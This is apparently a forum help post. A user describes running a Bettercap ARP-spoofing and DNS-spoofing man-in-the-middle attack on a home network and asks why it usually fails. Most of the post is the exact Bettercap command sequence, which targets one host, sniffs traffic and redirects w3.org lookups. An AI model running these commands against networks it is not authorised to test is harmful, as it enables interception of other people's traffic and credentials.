I am using Bettercap to perform a dns spoof / mitm in my home network.
It sometimes work and more of times it doesnt work . I cant figure out whats the problem …
These are the commands I use to perform it:-
set arp.spoof.fullduplex true
set arp.spoof.targets 192.168.249.110
set dns.spoof.address 192.168.249.97
set dns.spoof.all true
set dns.spoof.domains w3.org,*.w3.org
arp.spoof on
net.sniff on
dns.spoof on
It doesnt even work on http sites.
I have my browser’s history cleared. I can sniff the traffic but not able to send spoofed dns request.
Is it issue with bettercap?
Help is appreciated!